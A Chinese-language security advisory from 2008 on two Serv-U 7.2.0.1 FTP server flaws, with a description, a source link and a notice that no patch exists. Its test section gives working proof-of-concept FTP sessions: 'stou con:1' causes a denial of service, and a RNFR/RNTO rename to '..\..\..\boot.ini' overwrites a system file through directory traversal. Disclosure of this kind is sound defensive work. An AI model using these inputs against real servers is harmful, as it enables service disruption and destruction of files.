发布日期：2008-10-03
更新日期：2008-10-07

受影响系统：

RhinoSoft Serv-U 7.2.0.1

描述：

---

BUGTRAQ  ID: 31563,31556
CVE(CAN) ID: CVE-2008-4500,CVE-2008-4501

Serv-U FTP是一款FTP服务程序。

Serv-U FTP服务器实现上存在漏洞，如果远程攻击者向Serv-U FTP服务器发送的带有特制参数（如CON:1）的STOU FTP命令的话，就会耗尽可用的CPU资源；FTP服务在重新命名文件时的输入验证错误还允许攻击者通过目录遍历攻击覆盖或创建任意文件。

<*来源：dmnt
  
  链接：http://secunia.com/advisories/32150/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#Serv-U 7.2.0.1 ftp server DoS
#user must have upload permissions
#
#(x) dmnt 2008-10-01

220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
stou con:1
quit
221 Goodbye, closing session.
# now server DoS'ed


#Serv-U 7.2.0.1 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
#boot.ini rewrited

建议：

---

厂商补丁：

RhinoSoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.serv-u.com/

浏览次数：4915
严重程度：0（网友投票）